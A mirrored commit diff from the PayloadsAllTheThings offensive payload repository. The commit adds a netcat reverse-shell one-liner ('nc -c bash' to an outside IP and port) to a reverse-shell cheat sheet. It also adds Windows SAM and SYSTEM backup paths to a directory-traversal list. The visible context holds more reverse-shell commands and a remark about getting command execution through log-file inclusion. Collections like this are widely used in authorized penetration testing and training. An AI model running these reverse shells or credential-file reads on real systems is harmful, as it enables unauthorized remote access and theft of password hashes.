mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-02-11 17:32:09 +00:00
Merge pull request #106 from Hi15358/master
Update Reverse Shell Cheatsheet.md and Directory Traversal
This commit is contained in:
commit
b7fdf8aa3f
@ -144,6 +144,8 @@ c:/unattend.txt
|
|||||||
c:/unattend.xml
|
c:/unattend.xml
|
||||||
c:/unattended.txt
|
c:/unattended.txt
|
||||||
c:/unattended.xml
|
c:/unattended.xml
|
||||||
|
c:/windows/repair/sam
|
||||||
|
c:/windows/repair/system
|
||||||
```
|
```
|
||||||
|
|
||||||
The following log files are controllable and can be included with an evil payload to achieve a command execution
|
The following log files are controllable and can be included with an evil payload to achieve a command execution
|
||||||
|
@ -129,6 +129,7 @@ echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","
|
|||||||
```bash
|
```bash
|
||||||
nc -e /bin/sh [IPADDR] [PORT]
|
nc -e /bin/sh [IPADDR] [PORT]
|
||||||
nc.traditional -e /bin/bash 10.0.0.1 4444
|
nc.traditional -e /bin/bash 10.0.0.1 4444
|
||||||
|
nc -c bash 10.0.0.1 4444
|
||||||
```
|
```
|
||||||
|
|
||||||
### Netcat OpenBsd
|
### Netcat OpenBsd
|
||||||
|
Loading…
Reference in New Issue
Block a user